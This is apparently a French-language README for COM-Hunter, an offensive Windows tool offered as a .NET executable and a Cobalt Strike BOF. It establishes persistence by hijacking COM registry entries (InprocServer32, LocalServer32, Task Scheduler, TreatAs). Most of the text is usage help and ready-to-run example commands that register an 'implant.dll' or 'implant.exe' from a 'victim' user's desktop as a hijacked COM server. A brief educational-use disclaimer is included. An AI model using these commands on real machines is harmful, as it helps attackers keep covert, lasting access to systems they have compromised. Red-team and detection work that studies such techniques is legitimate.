
Outil de persistance par détournement COM Windows avec modes recherche, classique, Planificateur de tâches et TreatAs. Disponible en tant qu'exécutable .NET et BOF Cobalt Strike pour les opérations d'équipe rouge.
COM Hijacking VOODOO

COM-Hunter est un outil de persistance par COM Hijacking.
Disponible en version .NET et en variante BOF entièrement compatible avec Cobalt Strike.
La liste suivante explique les modes disponibles :
LocalServer32, InprocServer32 et les entrées de registre sous HKLM et HKCU.LocalServer32 ou InprocServer32.LocalServer32 ou InprocServer32.LocalServer32 ou InprocServer32.LocalServer32, InprocServer32 et les entrées de registre associées sous HKLM et HKCU.ℹ️ Cet outil a été sélectionné et fait fièrement partie du Cobalt Strike Community Kit.
Si vous trouvez des bugs, n'hésitez pas à les signaler. Vos retours sont précieux pour améliorer la qualité de ce projet !
Les auteurs et contributeurs de ce projet ne sont pas responsables de toute utilisation illégale de l'outil. Il est destiné uniquement à des fins éducatives. Les utilisateurs sont responsables de garantir une utilisation conforme à la loi.
Ce projet a été créé avec ❤️ par @nickvourd && @S1ckB0y1337.
Un merci spécial à mon ami Marios Gyftos pour son aide précieuse lors de la phase de test bêta de cet outil.
Inspiré par le cours RTO de @zeropointsecltd.
L'implémentation BOF s'inspire de Lefteris Panos et de son excellent projet, RegPersist.
Les fichiers base.c et bofdefs.h sont des copies directes du projet CS-Situational-Awareness-BOF de TrustedSec.
██████╗ ██████╗ ███╗ ███╗ ██╗ ██╗██╗ ██╗███╗ ██╗████████╗███████╗██████╗
██╔════╝██╔═══██╗████╗ ████║ ██║ ██║██║ ██║████╗ ██║╚══██╔══╝██╔════╝██╔══██╗
██║ ██║ ██║██╔████╔██║█████╗███████║██║ ██║██╔██╗ ██║ ██║ █████╗ ██████╔╝
██║ ██║ ██║██║╚██╔╝██║╚════╝██╔══██║██║ ██║██║╚██╗██║ ██║ ██╔══╝ ██╔══██╗
╚██████╗╚██████╔╝██║ ╚═╝ ██║ ██║ ██║╚██████╔╝██║ ╚████║ ██║ ███████╗██║ ██║
╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═╝ ╚══════╝╚═╝ ╚═╝
Version: 3.0
@nickvourd && @S1ckB0y1337
~ Inspired during the RTO course by @zeropointsecltd ~
Usage: COM_Hunter.exe <mode> <options>
[+] Available Modes:
search Search Mode
persist Classic Persist Mode
tasksch Task Scheduler Mode
treatas TreatAs Mode
remove Remove Mode
[+] Search Mode:
Usage: COM-Hunter.exe search <CLSID> <options>
-a, --all Search DLL and EXE implementations in HKLM and HKCU
-i, --inprocserver32 Search DLL implementations in HKLM and HKCU
-l, --localserver32 Search EXE implementations in HKLM and HKCU
-m, --machine Search DLL and EXE implementations in HKLM
-u, --user Search DLL and EXE implementations in HKCU
[+] Classic Persist Mode:
Usage: COM-Hunter.exe persist <CLSID> <binary_path> <option>
-i, --inprocserver32 Set DLL implementation
-l, --localserver32 Set EXE implementation
[+] Task Scheduler Mode:
Usage: COM-Hunter.exe tasksch <binary_path> <option>
-i, --inprocserver32 Set DLL implementation
-l, --localserver32 Set EXE implementation
[+] TreatAs Mode:
Usage: COM-Hunter.exe treatas <CLSID> <fake_CLSID> <binary_path> <option>
-i, --inprocserver32 Set DLL implementation
-l, --localserver32 Set EXE implementation
[+] Remove Mode:
Usage: COM-Hunter.exe remove <CLSID> <options>
-a, --all Remove DLL and EXE implementations in HKLM and HKCU
-i, --inprocserver32 Remove DLL implementations in HKLM and HKCU
-l, --localserver32 Remove EXE implementations in HKLM and HKCU
-m, --machine Remove DLL and EXE implementations in HKLM
-u, --user Remove DLL and EXE implementations in HKCU
ℹ️ Recherche des implémentations DLL et EXE dans HKLM et HKCU :
.\COM-Hunter.exe search 01575CFE-9A55-4003-A5E1-F38D1EBDCBE1 -a
ℹ️ Recherche des implémentations EXE dans HKLM et HKCU :
.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -l
ℹ️ Recherche avancée des implémentations EXE dans HKLM :
.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -l --machine
ℹ️ Recherche des implémentations EXE et DLL dans HKCU :
.\COM-Hunter.exe search AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 --user
ℹ️ Effectuer une persistance classique en utilisant une implémentation DLL :
.\COM-Hunter.exe persist AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 C:\Users\victim\Desktop\implant.dll -i
ℹ️ Effectuer une persistance classique en utilisant une implémentation EXE :
.\COM-Hunter.exe persist "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" C:\Users\victim\Desktop\implant.exe --localserver32
ℹ️ Effectuer une persistance via le Planificateur de tâches en utilisant une implémentation DLL :
.\COM-Hunter.exe tasksch C:\Users\victim\Desktop\implant.dll --inprocserver32
ℹ️ Effectuer une persistance via la clé de registre TreatAs et un faux CLSID (redirigeable) en utilisant une implémentation DLL :
.\COM-Hunter.exe treatas AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 "{00000012-1312-1997-2605-F38D1EBDCBE1}" C:\Users\victim\Desktop\implant.dll -i